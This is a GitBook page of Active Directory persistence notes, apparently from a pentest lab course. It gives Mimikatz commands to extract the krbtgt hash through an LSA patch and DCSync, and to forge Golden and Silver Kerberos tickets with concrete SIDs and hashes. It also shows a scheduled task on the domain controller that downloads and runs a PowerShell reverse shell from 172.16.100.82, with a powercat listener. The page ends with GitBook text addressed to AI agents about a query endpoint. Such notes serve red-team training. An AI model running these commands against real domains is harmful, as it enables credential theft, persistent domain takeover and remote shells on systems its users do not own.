> For the complete documentation index, see [llms.txt](https://likhith-cv.gitbook.io/wicked-security/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://likhith-cv.gitbook.io/wicked-security/active-directory/active-directory/persistance.md). # Persistance DC only validates when TGT's lifetime is more than 20 minutes. so we can even use deleted accounts\ KDC only checks the TGT ## Kerberos ## Golden Ticket It has a very long lifetime like 10 years\ encrypted by the hash of krbtgt account\ First create a token on behalf of domain admin ## Execute mimikatz on DC as DA to get krbtgt hash ``` klist purge // to delete all tickets Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –Computername dcorp-dc ``` To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges: ``` Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' ``` Using the DCSync option needs no code execution (no need to run Invoke-Mimikatz) on the target DC. ## On any machine to get a golden ticket ``` Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' ``` ## Silver Ticket Has a very short lifetime and gives access to the services given by the service account\ encrypted by the hash of service account\ silver tickets can issued for services like HOST(schedule tasks), CIFS(Shares), RPCSS, WSMAN here service account is a machine account for ex. DCORP-DC$ (1000) ``` Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:cifs /rc4:3c2392cdec22c2edb6e27381ee619849 /user:Administrator /ptt"' ``` ## Command Execution with Silver ticket ``` Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:HOST /rc4:3c2392cdec22c2edb6e27381ee619849 /user:Administrator /ptt"' ``` ``` add following line at the end of Invoke-PowerShellTcp.ps1 script Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.82 -Port 443 schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.82:1337/Invoke-PowerShellTcp1.ps1''')'" python -m SimpleHTTPServer 1337 powercat -l -v -p 443 schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck" ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://likhith-cv.gitbook.io/wicked-security/active-directory/active-directory/persistance.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.